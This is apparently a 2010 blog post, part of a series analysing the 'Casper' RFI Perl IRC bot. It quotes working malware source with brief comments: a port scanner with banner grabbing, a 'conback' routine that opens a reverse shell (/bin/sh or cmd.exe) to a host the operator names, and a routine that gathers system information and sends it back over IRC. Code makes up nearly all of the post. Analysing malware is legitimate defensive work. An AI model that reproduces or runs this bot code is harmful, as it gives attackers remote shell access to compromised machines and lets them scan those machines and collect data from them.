Sep 25 2010 9:21PM GMT
Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot
Casper RFI crack bot – Part 13
Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot
There is a few more things that are worth looking at.
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
We can do some port scans and grab some banners 
Here is the section for the connect back, /bin/sh or cmd.exe.
# Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
sendraw($IRC_cur_socket, "PRIVMSG $printl :02Conectando-se em02: $host:$porta");
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
}
This is handy.
elsif ($funcarg =~ /^info/) {
my $sysos = `uname -sr`;
my $uptime = `uptime`;
if ( $sysos =~ /freebsd/i ) {
$sysname = `hostname`;
$memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
$swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
chomp($memory);
chomp($swap);
}
elsif ( $sysos =~ /linux/i ) {
$sysname = `hostname -f`;
$memory = `free -m |grep -i mem | awk '{print \$2}'`;
$swap = `free -m |grep -i swap | awk '{print \$2}'`;
chomp($swap);
chomp($memory);
}
else {
$sysname ="Not Found";;
$memory ="Not found";
$swap ="Not Found";
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 SysInfo ^C3] ^C15-------------");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01os/host^C15^B;^B^C01 $sysos - $sysname ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01proc/PID^C15^B;^B^C01 $processo - $$");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01uptime^C15^B;^B^C01 $uptime");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01memory/swap^C15^B;^B^C01 $memory - $swap");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01perl/bot^C15^B;^B^C01 $] - $VERSAO");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 /SysInfo ^C3] ^C15------------");
}
Comment
RSS Feed
Email a friend
